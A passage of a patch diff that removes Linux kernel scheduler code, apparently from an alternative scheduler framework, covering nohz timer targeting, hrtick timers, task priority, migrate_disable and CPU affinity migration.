-+int get_nohz_timer_target(void)
-+{
-+	int i, cpu = smp_processor_id(), default_cpu = -1;
-+	struct cpumask *mask;
-+	const struct cpumask *hk_mask;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
-+		if (!idle_cpu(cpu))
-+			return cpu;
-+		default_cpu = cpu;
-+	}
-+
-+	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
-+
-+	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
-+		for_each_cpu_and(i, mask, hk_mask)
-+			if (!idle_cpu(i))
-+				return i;
-+
-+	if (default_cpu == -1)
-+		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
-+	cpu = default_cpu;
-+
-+	return cpu;
-+}
-+
-+/*
-+ * When add_timer_on() enqueues a timer into the timer wheel of an
-+ * idle CPU then this timer might expire before the next timer event
-+ * which is scheduled to wake up that CPU. In case of a completely
-+ * idle system the next event might even be infinite time into the
-+ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
-+ * leaves the inner idle loop so the newly added timer is taken into
-+ * account when the CPU goes back to idle and evaluates the timer
-+ * wheel for the next timer event.
-+ */
-+static inline void wake_up_idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (cpu == smp_processor_id())
-+		return;
-+
-+	if (set_nr_and_not_polling(rq->idle))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+static inline bool wake_up_full_nohz_cpu(int cpu)
-+{
-+	/*
-+	 * We just need the target to call irq_exit() and re-evaluate
-+	 * the next tick. The nohz full kick at least implies that.
-+	 * If needed we can still optimize that later with an
-+	 * empty IRQ.
-+	 */
-+	if (cpu_is_offline(cpu))
-+		return true;  /* Don't try to wake offline CPUs. */
-+	if (tick_nohz_full_cpu(cpu)) {
-+		if (cpu != smp_processor_id() ||
-+		    tick_nohz_tick_stopped())
-+			tick_nohz_full_kick_cpu(cpu);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_nohz_cpu(int cpu)
-+{
-+	if (!wake_up_full_nohz_cpu(cpu))
-+		wake_up_idle_cpu(cpu);
-+}
-+
-+static void nohz_csd_func(void *info)
-+{
-+	struct rq *rq = info;
-+	int cpu = cpu_of(rq);
-+	unsigned int flags;
-+
-+	/*
-+	 * Release the rq::nohz_csd.
-+	 */
-+	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
-+	WARN_ON(!(flags & NOHZ_KICK_MASK));
-+
-+	rq->idle_balance = idle_cpu(cpu);
-+	if (rq->idle_balance && !need_resched()) {
-+		rq->nohz_idle_balance = flags;
-+		raise_softirq_irqoff(SCHED_SOFTIRQ);
-+	}
-+}
-+
-+#endif /* CONFIG_NO_HZ_COMMON */
-+#endif /* CONFIG_SMP */
-+
-+static inline void check_preempt_curr(struct rq *rq)
-+{
-+	if (sched_rq_first_task(rq) != rq->curr)
-+		resched_curr(rq);
-+}
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+/*
-+ * Use HR-timers to deliver accurate preemption points.
-+ */
-+
-+static void hrtick_clear(struct rq *rq)
-+{
-+	if (hrtimer_active(&rq->hrtick_timer))
-+		hrtimer_cancel(&rq->hrtick_timer);
-+}
-+
-+/*
-+ * High-resolution timer tick.
-+ * Runs from hardirq context with interrupts disabled.
-+ */
-+static enum hrtimer_restart hrtick(struct hrtimer *timer)
-+{
-+	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
-+
-+	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
-+
-+	raw_spin_lock(&rq->lock);
-+	resched_curr(rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	return HRTIMER_NORESTART;
-+}
-+
-+/*
-+ * Use hrtick when:
-+ *  - enabled by features
-+ *  - hrtimer is actually high res
-+ */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	/**
-+	 * Alt schedule FW doesn't support sched_feat yet
-+	if (!sched_feat(HRTICK))
-+		return 0;
-+	*/
-+	if (!cpu_active(cpu_of(rq)))
-+		return 0;
-+	return hrtimer_is_hres_active(&rq->hrtick_timer);
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void __hrtick_restart(struct rq *rq)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	ktime_t time = rq->hrtick_time;
-+
-+	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
-+}
-+
-+/*
-+ * called from hardirq (IPI) context
-+ */
-+static void __hrtick_start(void *arg)
-+{
-+	struct rq *rq = arg;
-+
-+	raw_spin_lock(&rq->lock);
-+	__hrtick_restart(rq);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	s64 delta;
-+
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense and can cause timer DoS.
-+	 */
-+	delta = max_t(s64, delay, 10000LL);
-+
-+	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
-+
-+	if (rq == this_rq())
-+		__hrtick_restart(rq);
-+	else
-+		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
-+}
-+
-+#else
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense. Rely on vruntime for fairness.
-+	 */
-+	delay = max_t(u64, delay, 10000LL);
-+	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
-+		      HRTIMER_MODE_REL_PINNED_HARD);
-+}
-+#endif /* CONFIG_SMP */
-+
-+static void hrtick_rq_init(struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
-+#endif
-+
-+	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
-+	rq->hrtick_timer.function = hrtick;
-+}
-+#else	/* CONFIG_SCHED_HRTICK */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	return 0;
-+}
-+
-+static inline void hrtick_clear(struct rq *rq)
-+{
-+}
-+
-+static inline void hrtick_rq_init(struct rq *rq)
-+{
-+}
-+#endif	/* CONFIG_SCHED_HRTICK */
-+
-+static inline int __normal_prio(int policy, int rt_prio, int static_prio)
-+{
-+	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
-+		static_prio + MAX_PRIORITY_ADJ;
-+}
-+
-+/*
-+ * Calculate the expected normal priority: i.e. priority
-+ * without taking RT-inheritance into account. Might be
-+ * boosted by interactivity modifiers. Changes upon fork,
-+ * setprio syscalls, and whenever the interactivity
-+ * estimator recalculates.
-+ */
-+static inline int normal_prio(struct task_struct *p)
-+{
-+	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
-+}
-+
-+/*
-+ * Calculate the current priority, i.e. the priority
-+ * taken into account by the scheduler. This value might
-+ * be boosted by RT tasks as it will be RT if the task got
-+ * RT-boosted. If not then it returns p->normal_prio.
-+ */
-+static int effective_prio(struct task_struct *p)
-+{
-+	p->normal_prio = normal_prio(p);
-+	/*
-+	 * If we are RT tasks or we were boosted to RT priority,
-+	 * keep the priority unchanged. Otherwise, update priority
-+	 * to the normal priority:
-+	 */
-+	if (!rt_prio(p->prio))
-+		return p->normal_prio;
-+	return p->prio;
-+}
-+
-+/*
-+ * activate_task - move a task to the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static void activate_task(struct task_struct *p, struct rq *rq)
-+{
-+	enqueue_task(p, rq, ENQUEUE_WAKEUP);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+
-+	/*
-+	 * If in_iowait is set, the code below may not trigger any cpufreq
-+	 * utilization updates, so do it here explicitly with the IOWAIT flag
-+	 * passed.
-+	 */
-+	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
-+}
-+
-+/*
-+ * deactivate_task - remove a task from the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static inline void deactivate_task(struct task_struct *p, struct rq *rq)
-+{
-+	dequeue_task(p, rq, DEQUEUE_SLEEP);
-+	p->on_rq = 0;
-+	cpufreq_update_util(rq, 0);
-+}
-+
-+static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
-+	 * successfully executed on another CPU. We must ensure that updates of
-+	 * per-task data have been completed by this moment.
-+	 */
-+	smp_wmb();
-+
-+	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
-+#endif
-+}
-+
-+static inline bool is_migration_disabled(struct task_struct *p)
-+{
-+#ifdef CONFIG_SMP
-+	return p->migration_disabled;
-+#else
-+	return false;
-+#endif
-+}
-+
-+#define SCA_CHECK		0x01
-+#define SCA_USER		0x08
-+
-+#ifdef CONFIG_SMP
-+
-+void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
-+{
-+#ifdef CONFIG_SCHED_DEBUG
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * We should never call set_task_cpu() on a blocked task,
-+	 * ttwu() will sort out the placement.
-+	 */
-+	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
-+
-+#ifdef CONFIG_LOCKDEP
-+	/*
-+	 * The caller should hold either p->pi_lock or rq->lock, when changing
-+	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
-+	 *
-+	 * sched_move_task() holds both and thus holding either pins the cgroup,
-+	 * see task_group().
-+	 */
-+	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
-+				      lockdep_is_held(&task_rq(p)->lock)));
-+#endif
-+	/*
-+	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
-+	 */
-+	WARN_ON_ONCE(!cpu_online(new_cpu));
-+
-+	WARN_ON_ONCE(is_migration_disabled(p));
-+#endif
-+	if (task_cpu(p) == new_cpu)
-+		return;
-+	trace_sched_migrate_task(p, new_cpu);
-+	rseq_migrate(p);
-+	perf_event_task_migrate(p);
-+
-+	__set_task_cpu(p, new_cpu);
-+}
-+
-+#define MDF_FORCE_ENABLED	0x80
-+
-+static void
-+__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	/*
-+	 * This here violates the locking rules for affinity, since we're only
-+	 * supposed to change these variables while holding both rq->lock and
-+	 * p->pi_lock.
-+	 *
-+	 * HOWEVER, it magically works, because ttwu() is the only code that
-+	 * accesses these variables under p->pi_lock and only does so after
-+	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
-+	 * before finish_task().
-+	 *
-+	 * XXX do further audits, this smells like something putrid.
-+	 */
-+	SCHED_WARN_ON(!p->on_cpu);
-+	p->cpus_ptr = new_mask;
-+}
-+
-+void migrate_disable(void)
-+{
-+	struct task_struct *p = current;
-+	int cpu;
-+
-+	if (p->migration_disabled) {
-+		p->migration_disabled++;
-+		return;
-+	}
-+
-+	preempt_disable();
-+	cpu = smp_processor_id();
-+	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
-+		cpu_rq(cpu)->nr_pinned++;
-+		p->migration_disabled = 1;
-+		p->migration_flags &= ~MDF_FORCE_ENABLED;
-+
-+		/*
-+		 * Violates locking rules! see comment in __do_set_cpus_ptr().
-+		 */
-+		if (p->cpus_ptr == &p->cpus_mask)
-+			__do_set_cpus_ptr(p, cpumask_of(cpu));
-+	}
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_disable);
-+
-+void migrate_enable(void)
-+{
-+	struct task_struct *p = current;
-+
-+	if (0 == p->migration_disabled)
-+		return;
-+
-+	if (p->migration_disabled > 1) {
-+		p->migration_disabled--;
-+		return;
-+	}
-+
-+	if (WARN_ON_ONCE(!p->migration_disabled))
-+		return;
-+
-+	/*
-+	 * Ensure stop_task runs either before or after this, and that
-+	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
-+	 */
-+	preempt_disable();
-+	/*
-+	 * Assumption: current should be running on allowed cpu
-+	 */
-+	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
-+	if (p->cpus_ptr != &p->cpus_mask)
-+		__do_set_cpus_ptr(p, &p->cpus_mask);
-+	/*
-+	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
-+	 * regular cpus_mask, otherwise things that race (eg.
-+	 * select_fallback_rq) get confused.
-+	 */
-+	barrier();
-+	p->migration_disabled = 0;
-+	this_rq()->nr_pinned--;
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_enable);
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return rq->nr_pinned;
-+}
-+
-+/*
-+ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
-+ * __set_cpus_allowed_ptr() and select_fallback_rq().
-+ */
-+static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
-+{
-+	/* When not in the task's cpumask, no point in looking further. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/* migrate_disabled() must be allowed to finish. */
-+	if (is_migration_disabled(p))
-+		return cpu_online(cpu);
-+
-+	/* Non kernel threads are not allowed during either online or offline. */
-+	if (!(p->flags & PF_KTHREAD))
-+		return cpu_active(cpu) && task_cpu_possible(cpu, p);
-+
-+	/* KTHREAD_IS_PER_CPU is always allowed. */
-+	if (kthread_is_per_cpu(p))
-+		return cpu_online(cpu);
-+
-+	/* Regular kernel threads don't get to stay during offline. */
-+	if (cpu_dying(cpu))
-+		return false;
-+
-+	/* But are allowed during online. */
-+	return cpu_online(cpu);
-+}
-+
-+/*
-+ * This is how migration works:
-+ *
-+ * 1) we invoke migration_cpu_stop() on the target CPU using
-+ *    stop_one_cpu().
-+ * 2) stopper starts to run (implicitly forcing the migrated thread
-+ *    off the CPU)
-+ * 3) it checks whether the migrated task is still in the wrong runqueue.
-+ * 4) if it's in the wrong runqueue then the migration thread removes
-+ *    it and puts it into the right queue.
-+ * 5) stopper completes and stop_one_cpu() returns and the migration
-+ *    is done.
-+ */
-+
-+/*
-+ * move_queued_task - move a queued task to new rq.
-+ *
-+ * Returns (locked) new rq. Old rq's lock is released.
-+ */
-+static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
-+				   new_cpu)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
-+	dequeue_task(p, rq, 0);
-+	update_sched_preempt_mask(rq);
-+	set_task_cpu(p, new_cpu);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rq = cpu_rq(new_cpu);
-+
-+	raw_spin_lock(&rq->lock);
-+	WARN_ON_ONCE(task_cpu(p) != new_cpu);
-+	sched_task_sanity_check(p, rq);
-+	enqueue_task(p, rq, 0);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+	check_preempt_curr(rq);
-+
-+	return rq;
-+}
-+
-+struct migration_arg {
-+	struct task_struct *task;
-+	int dest_cpu;
-+};
-+
-+/*
-+ * Move (not current) task off this CPU, onto the destination CPU. We're doing
-+ * this because either it can't run here any more (set_cpus_allowed()
-+ * away from this CPU, or CPU going down), or because we're
-+ * attempting to rebalance this task on exec (sched_exec).
-+ *
-+ * So we race with normal scheduler movements, but that's OK, as long
-+ * as the task is no longer on this CPU.
-+ */
-+static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
-+				 dest_cpu)
-+{
-+	/* Affinity changed (again). */
-+	if (!is_cpu_allowed(p, dest_cpu))
-+		return rq;
-+
-+	update_rq_clock(rq);
-+	return move_queued_task(rq, p, dest_cpu);
-+}
-+
-+/*
-+ * migration_cpu_stop - this will be executed by a highprio stopper thread
-+ * and performs thread migration by bumping thread off CPU then
-+ * 'pushing' onto another runqueue.
-+ */
-+static int migration_cpu_stop(void *data)
-+{
-+	struct migration_arg *arg = data;
-+	struct task_struct *p = arg->task;
-+	struct rq *rq = this_rq();
-+	unsigned long flags;
-+
-+	/*
-+	 * The original target CPU might have gone down and we might
-+	 * be on another CPU but it doesn't matter.
-+	 */
-+	local_irq_save(flags);
-+	/*
-+	 * We need to explicitly wake pending tasks before running
-+	 * __migrate_task() such that we will not miss enforcing cpus_ptr
-+	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
-+	 */
-+	flush_smp_call_function_queue();
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+	/*
-+	 * If task_rq(p) != rq, it cannot be migrated here, because we're
-+	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
-+	 * we're holding p->pi_lock.
-+	 */
-+	if (task_rq(p) == rq && task_on_rq_queued(p))
-+		rq = __migrate_task(rq, p, arg->dest_cpu);
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	return 0;
-+}
-+
-+static inline void
-+set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	cpumask_copy(&p->cpus_mask, new_mask);
-+	p->nr_cpus_allowed = cpumask_weight(new_mask);
-+}
-+
-+static void
-+__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	lockdep_assert_held(&p->pi_lock);
-+	set_cpus_allowed_common(p, new_mask);
-+}
-+
-+void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	__do_set_cpus_allowed(p, new_mask);
-+}
-+
-+int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
-+		      int node)
-+{
-+	if (!src->user_cpus_ptr)
-+		return 0;
-+
-+	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
-+	if (!dst->user_cpus_ptr)
-+		return -ENOMEM;
-+
-+	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
-+	return 0;
-+}
-+
-+static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = NULL;
-+
-+	swap(p->user_cpus_ptr, user_mask);
-+
-+	return user_mask;
-+}
-+
-+void release_user_cpus_ptr(struct task_struct *p)
-+{
-+	kfree(clear_user_cpus_ptr(p));
-+}
-+
-+#endif
-+
-+/**
-+ * task_curr - is this task currently executing on a CPU?
-+ * @p: the task in question.
-+ *
-+ * Return: 1 if the task is currently executing. 0 otherwise.
-+ */
-+inline int task_curr(const struct task_struct *p)
-+{
-+	return cpu_curr(task_cpu(p)) == p;
-+}
-+
-+#ifdef CONFIG_SMP
-+/*
-+ * wait_task_inactive - wait for a thread to unschedule.
-+ *
-+ * Wait for the thread to block in any of the states set in @match_state.
-+ * If it changes, i.e. @p might have woken up, then return zero.  When we
-+ * succeed in waiting for @p to be off its CPU, we return a positive number
-+ * (its total switch count).  If a second call a short while later returns the
-+ * same number, the caller can be sure that @p has remained unscheduled the
-+ * whole time.
-+ *
-+ * The caller must ensure that the task *will* unschedule sometime soon,
-+ * else this function might spin for a *long* time. This function can't
-+ * be called with interrupts off, or it may introduce deadlock with
-+ * smp_call_function() if an IPI is sent by the same process we are
-+ * waiting to become inactive.
-+ */
-+unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
-+{
-+	unsigned long flags;
-+	bool running, on_rq;
-+	unsigned long ncsw;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+
-+		/*
-+		 * If the task is actively running on another CPU
-+		 * still, just relax and busy-wait without holding
-+		 * any locks.
-+		 *
-+		 * NOTE! Since we don't hold any locks, it's not
-+		 * even sure that "rq" stays as the right runqueue!
-+		 * But we don't care, since this will return false
-+		 * if the runqueue has changed and p is actually now
-+		 * running somewhere else!
-+		 */
-+		while (task_on_cpu(p) && p == rq->curr) {
-+			if (!(READ_ONCE(p->__state) & match_state))
-+				return 0;
-+			cpu_relax();
-+		}
-+
-+		/*
-+		 * Ok, time to look more closely! We need the rq
-+		 * lock now, to be *sure*. If we're wrong, we'll
-+		 * just go back and repeat.
-+		 */
-+		task_access_lock_irqsave(p, &lock, &flags);
-+		trace_sched_wait_task(p);
-+		running = task_on_cpu(p);
-+		on_rq = p->on_rq;
-+		ncsw = 0;
-+		if (READ_ONCE(p->__state) & match_state)
-+			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
-+		task_access_unlock_irqrestore(p, lock, &flags);
-+
-+		/*
-+		 * If it changed from the expected state, bail out now.
-+		 */
-+		if (unlikely(!ncsw))
-+			break;
-+
-+		/*
-+		 * Was it really running after all now that we
-+		 * checked with the proper locks actually held?
-+		 *
-+		 * Oops. Go back and try again..
-+		 */
-+		if (unlikely(running)) {
-+			cpu_relax();
-+			continue;
-+		}
-+
-+		/*
-+		 * It's not enough that it's not actively running,
-+		 * it must be off the runqueue _entirely_, and not
-+		 * preempted!
-+		 *
-+		 * So if it was still runnable (but just not actively
-+		 * running right now), it's preempted, and we should
-+		 * yield - it could be a while.
-+		 */
-+		if (unlikely(on_rq)) {
-+			ktime_t to = NSEC_PER_SEC / HZ;
-+
-+			set_current_state(TASK_UNINTERRUPTIBLE);
-+			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
-+			continue;
-+		}
-+
-+		/*
-+		 * Ahh, all good. It wasn't running, and it wasn't
-+		 * runnable, which means that it will never become
-+		 * running in the future either. We're all done!
-+		 */
-+		break;
-+	}
-+
-+	return ncsw;
-+}
-+
-+/***
-+ * kick_process - kick a running thread to enter/exit the kernel
-+ * @p: the to-be-kicked thread
-+ *
-+ * Cause a process which is running on another CPU to enter
-+ * kernel-mode, without any delay. (to get signals handled.)
-+ *
-+ * NOTE: this function doesn't have to take the runqueue lock,
-+ * because all it wants to ensure is that the remote task enters
-+ * the kernel. If the IPI races and the task has been migrated
-+ * to another CPU then no harm is done and the purpose has been
-+ * achieved as well.
-+ */
-+void kick_process(struct task_struct *p)
-+{
-+	int cpu;
-+
-+	preempt_disable();
-+	cpu = task_cpu(p);
-+	if ((cpu != smp_processor_id()) && task_curr(p))
-+		smp_send_reschedule(cpu);
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(kick_process);
-+
-+/*
-+ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
-+ *
-+ * A few notes on cpu_active vs cpu_online:
-+ *
-+ *  - cpu_active must be a subset of cpu_online
-+ *
-+ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
-+ *    see __set_cpus_allowed_ptr(). At this point the newly online
-+ *    CPU isn't yet part of the sched domains, and balancing will not
-+ *    see it.
-+ *
-+ *  - on cpu-down we clear cpu_active() to mask the sched domains and
-+ *    avoid the load balancer to place new tasks on the to be removed
-+ *    CPU. Existing tasks will remain running there and will be taken
-+ *    off.
-+ *
-+ * This means that fallback selection must not select !active CPUs.
-+ * And can assume that any active CPU must be online. Conversely
-+ * select_task_rq() below may allow selection of !active CPUs in order
-+ * to satisfy the above rules.
-+ */
-+static int select_fallback_rq(int cpu, struct task_struct *p)
-+{
-+	int nid = cpu_to_node(cpu);
-+	const struct cpumask *nodemask = NULL;
-+	enum { cpuset, possible, fail } state = cpuset;
-+	int dest_cpu;
-+
-+	/*
-+	 * If the node that the CPU is on has been offlined, cpu_to_node()
-+	 * will return -1. There is no CPU on the node, and we should
-+	 * select the CPU on the other node.
-+	 */
-+	if (nid != -1) {
-+		nodemask = cpumask_of_node(nid);
-+
-+		/* Look for allowed, online CPU in same node. */
-+		for_each_cpu(dest_cpu, nodemask) {
-+			if (is_cpu_allowed(p, dest_cpu))
-+				return dest_cpu;
-+		}
-+	}
-+
-+	for (;;) {
-+		/* Any allowed, online CPU? */
-+		for_each_cpu(dest_cpu, p->cpus_ptr) {
-+			if (!is_cpu_allowed(p, dest_cpu))
-+				continue;
-+			goto out;
-+		}
-+
-+		/* No more Mr. Nice Guy. */
-+		switch (state) {
-+		case cpuset:
-+			if (cpuset_cpus_allowed_fallback(p)) {
-+				state = possible;
-+				break;
-+			}
-+			fallthrough;
-+		case possible:
-+			/*
-+			 * XXX When called from select_task_rq() we only
-+			 * hold p->pi_lock and again violate locking order.
-+			 *
-+			 * More yuck to audit.
-+			 */
-+			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
-+			state = fail;
-+			break;
-+
-+		case fail:
-+			BUG();
-+			break;
-+		}
-+	}
-+
-+out:
-+	if (state != cpuset) {
-+		/*
-+		 * Don't tell them about moving exiting tasks or
-+		 * kernel threads (both mm NULL), since they never
-+		 * leave kernel.
-+		 */
-+		if (p->mm && printk_ratelimit()) {
-+			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
-+					task_pid_nr(p), p->comm, cpu);
-+		}
-+	}
-+
-+	return dest_cpu;
-+}
-+
-+static inline void
-+sched_preempt_mask_flush(cpumask_t *mask, int prio)
-+{
-+	int cpu;
-+
-+	cpumask_copy(mask, sched_idle_mask);
-+
-+	for_each_cpu_not(cpu, mask) {
-+		if (prio < cpu_rq(cpu)->prio)
-+			cpumask_set_cpu(cpu, mask);
-+	}
-+}
-+
-+static inline int
-+preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
-+{
-+	int task_prio = task_sched_prio(p);
-+	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
-+	int pr = atomic_read(&sched_prio_record);
-+
-+	if (pr != task_prio) {
-+		sched_preempt_mask_flush(mask, task_prio);
-+		atomic_set(&sched_prio_record, task_prio);
-+	}
-+
-+	return cpumask_and(preempt_mask, allow_mask, mask);
-+}
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	cpumask_t allow_mask, mask;
-+
-+	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
-+		return select_fallback_rq(task_cpu(p), p);
-+
-+	if (
-+#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
-+#endif
-+	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
-+	    preempt_mask_check(p, &allow_mask, &mask))
-+		return best_mask_cpu(task_cpu(p), &mask);
-+
-+	return best_mask_cpu(task_cpu(p), &allow_mask);
-+}
-+
-+void sched_set_stop_task(int cpu, struct task_struct *stop)
-+{
-+	static struct lock_class_key stop_pi_lock;
-+	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
-+	struct sched_param start_param = { .sched_priority = 0 };
-+	struct task_struct *old_stop = cpu_rq(cpu)->stop;
-+
-+	if (stop) {
-+		/*
-+		 * Make it appear like a SCHED_FIFO task, its something
-+		 * userspace knows about and won't get confused about.
-+		 *
-+		 * Also, it will make PI more or less work without too
-+		 * much confusion -- but then, stop work should not
-+		 * rely on PI working anyway.
-+		 */
-+		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
-+
-+		/*
-+		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
-+		 * adjust the effective priority of a task. As a result,
-+		 * rt_mutex_setprio() can trigger (RT) balancing operations,
-+		 * which can then trigger wakeups of the stop thread to push
-+		 * around the current task.
-+		 *
-+		 * The stop task itself will never be part of the PI-chain, it
-+		 * never blocks, therefore that ->pi_lock recursion is safe.
-+		 * Tell lockdep about this by placing the stop->pi_lock in its
-+		 * own class.
-+		 */
-+		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
-+	}
-+
-+	cpu_rq(cpu)->stop = stop;
-+
-+	if (old_stop) {
-+		/*
-+		 * Reset it back to a normal scheduling policy so that
-+		 * it can die in pieces.
-+		 */
-+		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
-+	}
-+}
-+
-+static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
-+			    raw_spinlock_t *lock, unsigned long irq_flags)
-+{
-+	/* Can the task run on the task's current CPU? If so, we're done */
-+	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
-+		if (p->migration_disabled) {
-+			if (likely(p->cpus_ptr != &p->cpus_mask))
-+				__do_set_cpus_ptr(p, &p->cpus_mask);
-+			p->migration_disabled = 0;
-+			p->migration_flags |= MDF_FORCE_ENABLED;
-+			/* When p is migrate_disabled, rq->lock should be held */
-+			rq->nr_pinned--;
-+		}
-+
-+		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
-+			struct migration_arg arg = { p, dest_cpu };
-+
-+			/* Need help from migration thread: drop lock and wait. */
-+			__task_access_unlock(p, lock);
-+			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+			return 0;
-+		}
-+		if (task_on_rq_queued(p)) {
-+			/*
-+			 * OK, since we're going to drop the lock immediately
-+			 * afterwards anyway.
-+			 */
-+			update_rq_clock(rq);
-+			rq = move_queued_task(rq, p, dest_cpu);
-+			lock = &rq->lock;
-+		}
-+	}
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	return 0;
-+}
-+
-+static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
-+					 const struct cpumask *new_mask,
-+					 u32 flags,
-+					 struct rq *rq,
-+					 raw_spinlock_t *lock,
-+					 unsigned long irq_flags)
-+{
